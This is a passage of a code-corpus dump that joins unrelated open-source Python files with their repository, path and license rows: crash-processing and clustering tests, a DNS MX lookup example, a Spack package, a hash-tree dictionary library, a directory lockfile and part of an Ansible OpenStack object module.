config.transaction_executor_class = mock.Mock()
config.batchJobLimit = 10
config.logger = mock.Mock()
class StubbedIterators(LegacyNewCrashSource):
def _normal_jobs_iter(self):
while True:
yield None
def _priority_jobs_iter(self):
values = [
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
(4, '4567', 1),
(5, '5678', 1),
]
for x in values:
yield x
new_crash_source = StubbedIterators(config,
processor_name='victor1234')
expected = ('1234',
'2345',
'3456',
'4567',
'5678',
)
for x, y in zip(new_crash_source, expected):
eq_(x, ((y,), {}))
eq_(len([x for x in new_crash_source]), 5)
def test_incoming_job_stream_interleaved(self):
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = mock.Mock()
config.batchJobLimit = 10
config.logger = mock.Mock()
class StubbedIterators(LegacyNewCrashSource):
def _normal_jobs_iter(self):
values = [
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
(4, '4567', 1),
(5, '5678', 1),
None,
None,
]
for x in values:
yield x
def _priority_jobs_iter(self):
values = [
None,
(10, 'p1234', 1),
(20, 'p2345', 1),
None,
(30, 'p3456', 1),
(40, 'p4567', 1),
None,
None,
(50, 'p5678', 1),
None,
]
for x in values:
yield x
new_crash_source = StubbedIterators(config,
processor_name='sherman1234')
expected = ('1234',
'p1234',
'p2345',
'2345',
'p3456',
'p4567',
'3456',
'4567',
'p5678',
'5678',
)
for x, y in zip(new_crash_source, expected):
eq_(x, ((y,), {}))
eq_(len([x for x in new_crash_source]), 10)
def test_priority_jobs_iter_simple(self):
m_transaction = mock.Mock()
m_transaction_executor_class = mock.Mock(return_value=m_transaction)
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = m_transaction_executor_class
config.batchJobLimit = 10
config.logger = mock.Mock()
transaction_returns = (
'priority_jobs_17',
[ # fetchall
(1, '1234', 1, None),
(2, '2345', 1, None),
(3, '3456', 1, None),
],
None, # delete
None, # delete
None, # delete
[ # nothing to do
],
[
(4, '4567', 1, None),
(5, '5678', 1, None),
],
None, # delete
None, # delete
[ # nothing to do
],
None, # drop table
)
m_transaction.side_effect = sequencer(*transaction_returns)
expected_sequence = (
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
None,
(4, '4567', 1),
(5, '5678', 1),
)
new_crash_source = LegacyNewCrashSource(config,
processor_name='dwight')
for x, y in zip(new_crash_source._priority_jobs_iter(),
expected_sequence):
eq_(x, y)
expected_get_priority_jobs_sql = (
"select"
" j.id,"
" pj.uuid,"
" 1,"
" j.starteddatetime "
"from"
" jobs j right join priority_jobs_17 pj on j.uuid = pj.uuid"
)
expected_delete_one_priority_job_sql = (
"delete from priority_jobs_17 where uuid = %s"
)
expected_transactions = (
((new_crash_source._create_priority_jobs,),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_no_results, expected_delete_one_priority_job_sql,
('1234',)),),
((execute_no_results, expected_delete_one_priority_job_sql,
('2345',)),),
((execute_no_results, expected_delete_one_priority_job_sql,
('3456',)),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_no_results, expected_delete_one_priority_job_sql,
('4567',)),),
((execute_no_results, expected_delete_one_priority_job_sql,
('5678',)),),
((execute_query_fetchall, expected_get_priority_jobs_sql,),),
((execute_no_results, "drop table priority_jobs_17"),),
)
for actual, expected in zip(m_transaction.call_args_list,
expected_transactions):
eq_(actual, expected)
def test_normal_jobs_iter_simple(self):
m_transaction = mock.Mock()
m_transaction_executor_class = mock.Mock(return_value=m_transaction)
config = DotDict()
config.database_class = mock.Mock()
config.transaction_executor_class = m_transaction_executor_class
config.batchJobLimit = 10
config.logger = mock.Mock()
config.pollingInterval = timedelta(0, 0, 0, 0)
transaction_returns = (
'priority_jobs_17',
[ # fetchall
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
],
[ # nothing to do
],
[
(4, '4567', 1),
(5, '5678', 1),
],
None, # drop table
)
m_transaction.side_effect = sequencer(*transaction_returns)
exepected_sequence = (
(1, '1234', 1),
(2, '2345', 1),
(3, '3456', 1),
None,
(4, '4567', 1),
(5, '5678', 1),
)
new_crash_source = LegacyNewCrashSource(config,
processor_name='dwight')
new_crash_source.processor_id = 17
for x, y in zip(new_crash_source._normal_jobs_iter(),
exepected_sequence):
eq_(x, y)
expected_get_normal_sql = (
"select"
" j.id,"
" j.uuid,"
" priority "
"from"
" jobs j "
"where"
" j.owner = 17"
" and j.starteddatetime is null "
"order by queueddatetime"
" limit 10"
)
expected_transactions = (
((new_crash_source._create_priority_jobs,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_query_fetchall, expected_get_normal_sql,),),
((execute_no_results, "drop table priority_jobs_17"),),
)
for actual, expected in zip(m_transaction.call_args_list,
expected_transactions):
eq_(actual, expected)
| mpl-2.0 |
openNSS/enigma2 | tests/events.py | 72 | 1648 | import time
import tests
recorded_events = [ ]
def event(self, name, args, kwargs):
global recorded_events
print "*EVENT*", time.time(), self, name, args, kwargs
recorded_events.append((time.time(), self, name, args, kwargs))
def eventfnc(f):
name = f.__name__
def wrapper(self, *args, **kwargs):
event(self, name, args, kwargs)
return f(self, *args, **kwargs)
return wrapper
def get_events():
global recorded_events
r = recorded_events
recorded_events = [ ]
return r
def start_log():
global base_time
base_time = time.time()
def end_log(test_name):
global base_time
results = ""
for (t, self, method, args, kwargs) in get_events():
results += "%s T+%f: %s::%s(%s, *%s, *%s)\n" % (time.ctime(t), t - base_time, str(self.__class__), method, self, args, kwargs)
expected = None
try:
f = open(test_name + ".results", "rb")
expected = f.read()
f.close()
except:
print "NO TEST RESULT FOUND, creating new"
f = open(test_name + ".new_results", "wb")
f.write(results)
f.close()
print results
if expected is not None:
print "expected:"
if expected != results:
open(test_name + ".bogus_results", "wb").write(results)
raise tests.TestError("test data does not match")
else:
print "test compared ok"
else:
print "no test data to compare with."
def log(fnc, base_time = 0, test_name = "test", *args, **kwargs):
import fake_time
fake_time.setTime(base_time)
start_log()
try:
fnc(*args, **kwargs)
event(None, "test_completed", [], {"test_name": test_name})
except tests.TestError,c:
event(None, "test_failed", [], {"test_name": test_name, "reason": str(c)})
end_log(test_name)
| gpl-2.0 |
pavel-odintsov/unbound_systemd | libunbound/python/examples/mx-lookup.py | 18 | 2165 | #!/usr/bin/python
# vim:fileencoding=utf-8
'''
mx-lookup.py: Lookup for MX records
Authors: Zdenek Vasicek (vasicek AT fit.vutbr.cz)
Marek Vavrusa (xvavru00 AT stud.fit.vutbr.cz)
Copyright (c) 2008. All rights reserved.
This software is open source.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import print_function
import unbound
ctx = unbound.ub_ctx()
ctx.resolvconf("/etc/resolv.conf")
status, result = ctx.resolve("nic.cz", unbound.RR_TYPE_MX, unbound.RR_CLASS_IN)
if status == 0 and result.havedata:
print("Result:")
print(" raw data:", result.data)
for k in sorted(result.data.mx_list):
print(" priority:%d address:%s" % k)
status, result = ctx.resolve("nic.cz", unbound.RR_TYPE_A, unbound.RR_CLASS_IN)
if status == 0 and result.havedata:
print("Result:")
print(" raw data:", result.data)
for k in sorted(result.data.address_list):
print(" address:%s" % k)
| bsd-3-clause |
erikedin/glowing-sceptre | googletest-release-1.8.0/googlemock/scripts/generator/cpp/utils.py | 1158 | 1153 | #!/usr/bin/env python
#
# Copyright 2007 Neal Norwitz
# Portions Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Generic utilities for C++ parsing."""
__author__ = 'nnorwitz@google.com (Neal Norwitz)'
import sys
# Set to True to see the start/end token indices.
DEBUG = True
def ReadFile(filename, print_error=True):
"""Returns the contents of a file."""
try:
fp = open(filename)
try:
return fp.read()
finally:
fp.close()
except IOError:
if print_error:
print('Error reading %s: %s' % (filename, sys.exc_info()[1]))
return None
| apache-2.0 |
tmerrick1/spack | var/spack/repos/builtin/packages/nextflow/package.py | 5 | 2177 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Nextflow(Package):
"""Data-driven computational pipelines"""
homepage = "http://www.nextflow.io"
url = "https://github.com/nextflow-io/nextflow/releases/download/v0.24.1/nextflow"
version('0.25.6', '29d739b6caf8ceb5aa9997310ee8d0e7',
expand=False)
version('0.24.1', '80ec8c4fe8e766e0bdd1371a50410d1d',
expand=False)
version('0.23.3', '71fb69275b6788af1c6f1165f40d362e',
expand=False)
version('0.21.0', '38e5e335cb33f05ba358e1f883c8386c',
expand=False)
version('0.20.1', '0e4e0e3eca1c2c97f9b4bffd944b923a',
expand=False)
version('0.17.3', '5df00105fb1ce6fd0ba019ae735d9617',
expand=False)
depends_on('java')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install("nextflow", join_path(prefix.bin, "nextflow"))
set_executable(join_path(prefix.bin, "nextflow"))
| lgpl-2.1 |
jessstrap/servotk | tests/wpt/css-tests/tools/pywebsocket/src/test/testdata/handlers/sub/plain_wsh.py | 499 | 1789 | # Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
def web_socket_do_extra_handshake(request):
pass
def web_socket_transfer_data(request):
request.connection.write('sub/plain_wsh.py is called for %s, %s' %
(request.ws_resource, request.ws_protocol))
# vi:sts=4 sw=4 et
| mpl-2.0 |
JoEiner/hasheddict | hasheddict/__init__.py | 1 | 10088 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
from zlib import crc32
from hashlib import sha256
from math import log, ceil
import collections
import threading
__all__ = ['HashedDict']
__version__ = "0.1.0"
__author__ = "Johannes Schreiner, johannes@schreiner.io"
__credits__ = ["Johannes Schreiner"]
__url__ = "https://github.com/JoEiner/hasheddict"
__copyright__ = "(c) 2015 Johannes Schreiner"
__license__ = "GNU General Public License v3 or later (GPLv3+)"
class HashedDict(dict):
"""
A dictionary that provides cryptographic hashes of its contents.
See package documentation for usage instructions.
"""
def __init__(self, *args, **kwargs):
"""
Possible ways of instantiation:
HashedDict([algorithm[, trees_cache_size], ])
HashedDict([algorithm[, trees_cache_size], ]**kwargs)
HashedDict([algorithm[, trees_cache_size], ]iterable, **kwargs)
HashedDict([algorithm[, trees_cache_size], ]mapping, **kwargs)
@param algorithm: algorithm is a class that provides an interface
similar to hashlib.sha*() interface (see Lib/hashlib.py)
@type trees_cache_size: int
@param trees_cache_size: The number of internal trees the HashedDict buffers.
Raising this number increases memory usage, yet reduces
time consumption when the dictionary grows over its boundaries
Use only positive integers.
Examples::
>>> a = dict(one=1, two=2, three=3)
>>> b = dict(zip(['one', 'two', 'three'], [1, 2, 3]))
>>> c = dict([('two', 2), ('one', 1), ('three', 3)])
>>> d = dict({'three': 3, 'one': 1, 'two': 2})
>>> from hashlib import md5, sha512
>>> e = dict(md5, one=1, two=2, three=3)
>>> f = dict(1, sha512, zip(range(100000), reversed(range(100000))))
"""
dictargs = [arg for arg in args if isinstance(arg, collections.Iterable) or
isinstance(arg, collections.Mapping)]
if len(dictargs) > 1:
raise TypeError("HashedDict expected at most 1 iterable or mapping "
"argument, got %d" % len(args))
hashargs = [arg for arg in args if not isinstance(arg, collections.Iterable) and
not isinstance(arg, collections.Mapping)]
self.__hashalg = args[0] if len(hashargs) >= 1 else sha256
self.__trees_cache_size = args[1] if len(hashargs) >= 2 else 3
self.__key_to_hash = dict()
depth = self.__get_depth_for_length(0)
initial_tree = HashTree(self.__key_to_hash, self.__hashalg, depth)
initial_tree.start()
initial_tree.join()
self.__trees = {depth: initial_tree}
self.update(*dictargs, **kwargs)
def get_hash(self):
tree_nr = self.__get_depth_for_length(len(self))
return self.__trees[tree_nr].get_hash()
def __setitem__(self, key, value):
hash_value = self.__hash_item(key, value)
self.__key_to_hash[key] = hash_value
if key in self:
for tree in self.__trees.itervalues():
tree.delete(key, hash_value)
super(HashedDict, self).__setitem__(key, value)
for tree in self.__trees.itervalues():
tree.add(key, hash_value)
self.__manage_cached_trees()
def __delitem__(self, key):
self.__manage_cached_trees()
for tree in self.__trees.itervalues():
tree.delete(key, self.__key_to_hash[key])
del self.__key_to_hash[key]
super(HashedDict, self).__delitem__(key)
def update(self, *args, **kwargs):
if args:
if len(args) > 1:
raise TypeError("update expected at most 1 arguments, "
"got %d" % len(args))
other = dict(args[0])
for key in other:
self[key] = other[key]
for key in kwargs:
self[key] = kwargs[key]
def setdefault(self, key, value=None):
if key not in self:
self[key] = value
return self[key]
def __manage_cached_trees(self):
dict_length = len(self)
curr_depth = self.__get_depth_for_length(dict_length)
range_start = max(0, curr_depth - (self.__trees_cache_size/2))
range_end = range_start + self.__trees_cache_size
allowed_trees = set(xrange(range_start, range_end))
existing_trees = set(self.__trees.keys())
deprecated_keys = existing_trees - allowed_trees
new_keys = allowed_trees - existing_trees
for tree_key in deprecated_keys:
del self.__trees[tree_key]
for tree_key in new_keys:
new_tree = HashTree(self.__key_to_hash,
self.__hashalg, tree_key)
new_tree.start()
self.__trees[tree_key] = new_tree
@staticmethod
def __get_depth_for_length(length):
if length == 0:
return 0
else:
return int(ceil(log(length, 2)))
def __hash_item(self, key, value):
return (self.__hashalg(self.__hashalg(repr(key)).digest() +
self.__hashalg(repr(value)).digest()).digest())
class HashTree(threading.Thread):
def __init__(self, key_to_hash, hashalg, tree_depth):
threading.Thread.__init__(self)
self.__key_to_hash = key_to_hash.copy()
self.__tree_depth = tree_depth
self.__hashalg = hashalg
def run(self):
self.__tree = self.__build_tree()
self.__leaf_hashes = self.__build_leaf_items()
self.__rehash_all()
def get_hash(self):
self.join()
return self.__tree[0][0]
def add(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
self.__leaf_hashes[position].append(hash_value)
self.__rehash(position)
def delete(self, key, hash_value):
self.join()
position = (crc32(key) & 0xffffffff) & ((1 << self.__tree_depth) - 1)
while hash_value in self.__leaf_hashes[position]:
self.__leaf_hashes[position].remove(hash_value)
self.__rehash(position)
def __build_tree(self):
tree = []
for i in xrange(self.__tree_depth+1):
current_row = [None for j in xrange(1 << i)]
tree.append(current_row)
return tree
def __build_leaf_items(self):
leaf_count = 1 << self.__tree_depth
new_leaf_items = [[] for i in xrange(leaf_count)]
for key, hash_value in self.__key_to_hash.iteritems():
position = (crc32(key) & 0xffffffff) % leaf_count
new_leaf_items[position].append(hash_value)
return new_leaf_items
def __rehash_all(self):
self.__tree[-1] = [self.__hash_leaf(leaf_items) for leaf_items in self.__leaf_hashes]
for row_nr in xrange(self.__tree_depth,0,-1):
row = self.__tree[row_nr]
for current_position in xrange(0, (len(row)+1)/2):
self.__rehash_parent(row_nr, current_position)
def __rehash(self, leaf_position):
leaf_items = self.__leaf_hashes[leaf_position]
self.__tree[-1][leaf_position] = self.__hash_leaf(leaf_items)
lchild_pos = leaf_position
for row_nr in xrange(self.__tree_depth, 0, -1):
#current_position = self.__rehash_parent(row_nr, current_position)
rchild_pos = lchild_pos | (1 << (row_nr - 1))
lchild_pos = lchild_pos & ((1 << (row_nr - 1)) - 1)
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
def __hash_leaf(self, leaf_items):
leaf_items.sort()
hashalg = self.__hashalg()
for item in leaf_items:
hashalg.update(item)
return hashalg.digest()
def __rehash_parent(self, row_nr, element_pos):
lchild_pos = element_pos & ((1 << (row_nr - 1)) - 1)
rchild_pos = element_pos | (1 << (row_nr - 1))
#parent_pos = lchild_pos
children_row = self.__tree[row_nr]
parent_row = self.__tree[row_nr-1]
#lchild_hash = children_row[lchild_pos]
#rchild_hash = children_row[rchild_pos]
#parent_row[parent_pos] = self.__hashalg(lchild_hash + \
# rchild_hash).digest()
parent_row[lchild_pos] = self.__hashalg(children_row[lchild_pos] + \
children_row[rchild_pos]).digest()
if __name__ == '__main__':
pangram = HashedDict(pangram="The quick brown fox jumps over the lazy dog")
assert pangram.get_hash() == '\xe9|\xdcJ=\xda\x84\xbd\xa6\x8e\xea\x9c=\x16\x93' + \
'x\xb2\xff9\x83S!\xfbE\xbc\x0c\x83\xb8`H\x94\xa6'
hd1 = HashedDict()
empty_hash = hd1.get_hash()
assert empty_hash == "\xe3\xb0\xc4B\x98\xfc\x1c\x14\x9a\xfb\xf4\xc8\x99" + \
"o\xb9$'\xaeA\xe4d\x9b\x93L\xa4\x95\x99\x1bxR\xb8U"
hd1["key1"] = "value1"
new_hash = hd1.get_hash()
del hd1["key1"]
assert empty_hash == hd1.get_hash()
hd2 = HashedDict(key1="value1", key2="value2")
del hd2["key2"]
assert hd2.get_hash() == new_hash
del hd2["key1"]
assert hd2.get_hash() == empty_hash
hd3 = HashedDict()
assert hd3.get_hash() == empty_hash
hashList = []
for i in xrange(1026):
hashList.append(hd3.get_hash())
hd3[str(i)] = i
for i in xrange(1025, -1, -1):
del hd3[str(i)]
assert hashList[i] == hd3.get_hash()
print "all tests successful"
| gpl-3.0 |
zasdfgbnm/tensorflow | tensorflow/python/kernel_tests/tensor_priority_test.py | 134 | 2788 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the binary ops priority mechanism."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.platform import test as test_lib
class TensorPriorityTest(test_lib.TestCase):
def testSupportedRhsWithoutDelegation(self):
class NumpyArraySubclass(np.ndarray):
pass
supported_rhs_without_delegation = (3, 3.0, [1.0, 2.0], np.array(
[1.0, 2.0]), NumpyArraySubclass(
shape=(1, 2), buffer=np.array([1.0, 2.0])),
ops.convert_to_tensor([[1.0, 2.0]]))
for rhs in supported_rhs_without_delegation:
tensor = ops.convert_to_tensor([[10.0, 20.0]])
res = tensor + rhs
self.assertIsInstance(res, ops.Tensor)
def testUnsupportedRhsWithoutDelegation(self):
class WithoutReverseAdd(object):
pass
tensor = ops.convert_to_tensor([[10.0, 20.0]])
rhs = WithoutReverseAdd()
with self.assertRaisesWithPredicateMatch(
TypeError, lambda e: "Expected float" in str(e)):
# pylint: disable=pointless-statement
tensor + rhs
def testUnsupportedRhsWithDelegation(self):
class WithReverseAdd(object):
def __radd__(self, lhs):
return "Works!"
tensor = ops.convert_to_tensor([[10.0, 20.0]])
rhs = WithReverseAdd()
res = tensor + rhs
self.assertEqual(res, "Works!")
def testFullDelegationControlUsingRegistry(self):
class NumpyArraySubclass(np.ndarray):
def __radd__(self, lhs):
return "Works!"
def raise_to_delegate(value, dtype=None, name=None, as_ref=False):
del value, dtype, name, as_ref # Unused.
raise TypeError
ops.register_tensor_conversion_function(
NumpyArraySubclass, raise_to_delegate, priority=0)
tensor = ops.convert_to_tensor([[10.0, 20.0]])
rhs = NumpyArraySubclass(shape=(1, 2), buffer=np.array([1.0, 2.0]))
res = tensor + rhs
self.assertEqual(res, "Works!")
if __name__ == "__main__":
test_lib.main()
| apache-2.0 |
johankaito/fufuka | microblog/old-flask/lib/python2.7/site-packages/pip/_vendor/lockfile/mkdirlockfile.py | 478 | 3098 | from __future__ import absolute_import, division
import time
import os
import sys
import errno
from . import (LockBase, LockFailed, NotLocked, NotMyLock, LockTimeout,
AlreadyLocked)
class MkdirLockFile(LockBase):
"""Lock file by creating a directory."""
def __init__(self, path, threaded=True, timeout=None):
"""
>>> lock = MkdirLockFile('somefile')
>>> lock = MkdirLockFile('somefile', threaded=False)
"""
LockBase.__init__(self, path, threaded, timeout)
# Lock file itself is a directory. Place the unique file name into
# it.
self.unique_name = os.path.join(self.lock_file,
"%s.%s%s" % (self.hostname,
self.tname,
self.pid))
def acquire(self, timeout=None):
timeout = timeout is not None and timeout or self.timeout
end_time = time.time()
if timeout is not None and timeout > 0:
end_time += timeout
if timeout is None:
wait = 0.1
else:
wait = max(0, timeout / 10)
while True:
try:
os.mkdir(self.lock_file)
except OSError:
err = sys.exc_info()[1]
if err.errno == errno.EEXIST:
# Already locked.
if os.path.exists(self.unique_name):
# Already locked by me.
return
if timeout is not None and time.time() > end_time:
if timeout > 0:
raise LockTimeout("Timeout waiting to acquire"
" lock for %s" %
self.path)
else:
# Someone else has the lock.
raise AlreadyLocked("%s is already locked" %
self.path)
time.sleep(wait)
else:
# Couldn't create the lock for some other reason
raise LockFailed("failed to create %s" % self.lock_file)
else:
open(self.unique_name, "wb").close()
return
def release(self):
if not self.is_locked():
raise NotLocked("%s is not locked" % self.path)
elif not os.path.exists(self.unique_name):
raise NotMyLock("%s is locked, but not by me" % self.path)
os.unlink(self.unique_name)
os.rmdir(self.lock_file)
def is_locked(self):
return os.path.exists(self.lock_file)
def i_am_locking(self):
return (self.is_locked() and
os.path.exists(self.unique_name))
def break_lock(self):
if os.path.exists(self.lock_file):
for name in os.listdir(self.lock_file):
os.unlink(os.path.join(self.lock_file, name))
os.rmdir(self.lock_file)
| apache-2.0 |
joshloyal/scikit-learn | sklearn/cluster/tests/test_affinity_propagation.py | 341 | 2620 | """
Testing for Clustering methods
"""
import numpy as np
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_raises
from sklearn.cluster.affinity_propagation_ import AffinityPropagation
from sklearn.cluster.affinity_propagation_ import affinity_propagation
from sklearn.datasets.samples_generator import make_blobs
from sklearn.metrics import euclidean_distances
n_clusters = 3
centers = np.array([[1, 1], [-1, -1], [1, -1]]) + 10
X, _ = make_blobs(n_samples=60, n_features=2, centers=centers,
cluster_std=0.4, shuffle=True, random_state=0)
def test_affinity_propagation():
# Affinity Propagation algorithm
# Compute similarities
S = -euclidean_distances(X, squared=True)
preference = np.median(S) * 10
# Compute Affinity Propagation
cluster_centers_indices, labels = affinity_propagation(
S, preference=preference)
n_clusters_ = len(cluster_centers_indices)
assert_equal(n_clusters, n_clusters_)
af = AffinityPropagation(preference=preference, affinity="precomputed")
labels_precomputed = af.fit(S).labels_
af = AffinityPropagation(preference=preference, verbose=True)
labels = af.fit(X).labels_
assert_array_equal(labels, labels_precomputed)
cluster_centers_indices = af.cluster_centers_indices_
n_clusters_ = len(cluster_centers_indices)
assert_equal(np.unique(labels).size, n_clusters_)
assert_equal(n_clusters, n_clusters_)
# Test also with no copy
_, labels_no_copy = affinity_propagation(S, preference=preference,
copy=False)
assert_array_equal(labels, labels_no_copy)
# Test input validation
assert_raises(ValueError, affinity_propagation, S[:, :-1])
assert_raises(ValueError, affinity_propagation, S, damping=0)
af = AffinityPropagation(affinity="unknown")
assert_raises(ValueError, af.fit, X)
def test_affinity_propagation_predict():
# Test AffinityPropagation.predict
af = AffinityPropagation(affinity="euclidean")
labels = af.fit_predict(X)
labels2 = af.predict(X)
assert_array_equal(labels, labels2)
def test_affinity_propagation_predict_error():
# Test exception in AffinityPropagation.predict
# Not fitted.
af = AffinityPropagation(affinity="euclidean")
assert_raises(ValueError, af.predict, X)
# Predict not supported when affinity="precomputed".
S = np.dot(X, X.T)
af = AffinityPropagation(affinity="precomputed")
af.fit(S)
assert_raises(ValueError, af.predict, X)
| bsd-3-clause |
gaddman/ansible | lib/ansible/modules/cloud/openstack/os_object.py | 87 | 3841 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <benno@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: os_object
short_description: Create or Delete objects and containers from OpenStack
version_added: "2.0"
author: "Monty Taylor (@emonty)"
extends_documentation_fragment: openstack
description:
- Create or Delete objects and containers from OpenStack
options:
container:
description:
- The name of the container in which to create the object
required: true
name:
description:
- Name to be give to the object. If omitted, operations will be on
the entire container
required: false
filename:
description:
- Path to local file to be uploaded.
required: false
container_access:
description:
- desired container access level.
required: false
choices: ['private', 'public']
default: private
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
availability_zone:
description:
- Ignored. Present for backwards compatibility
required: false
'''
EXAMPLES = '''
- name: "Create a object named 'fstab' in the 'config' container"
os_object:
cloud: mordred
state: present
name: fstab
container: config
filename: /etc/fstab
- name: Delete a container called config and all of its contents
os_object:
cloud: rax-iad
state: absent
container: config
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.openstack import openstack_full_argument_spec, openstack_module_kwargs, openstack_cloud_from_module
def process_object(
cloud_obj, container, name, filename, container_access, **kwargs):
changed = False
container_obj = cloud_obj.get_container(container)
if kwargs['state'] == 'present':
if not container_obj:
container_obj = cloud_obj.create_container(container)
changed = True
if cloud_obj.get_container_access(container) != container_access:
cloud_obj.set_container_access(container, container_access)
changed = True
if name:
if cloud_obj.is_object_stale(container, name, filename):
cloud_obj.create_object(container, name, filename)
changed = True
else:
if container_obj:
if name:
if cloud_obj.get_object_metadata(container, name):
cloud_obj.delete_object(container, name)
changed = True
else:
cloud_obj.delete_container(container)
changed = True
return changed
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=False, default=None),
container=dict(required=True),
filename=dict(required=False, default=None),
container_access=dict(default='private', choices=['private', 'public']),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
sdk, cloud = openstack_cloud_from_module(module)
try:
changed = process_object(cloud, **module.params)
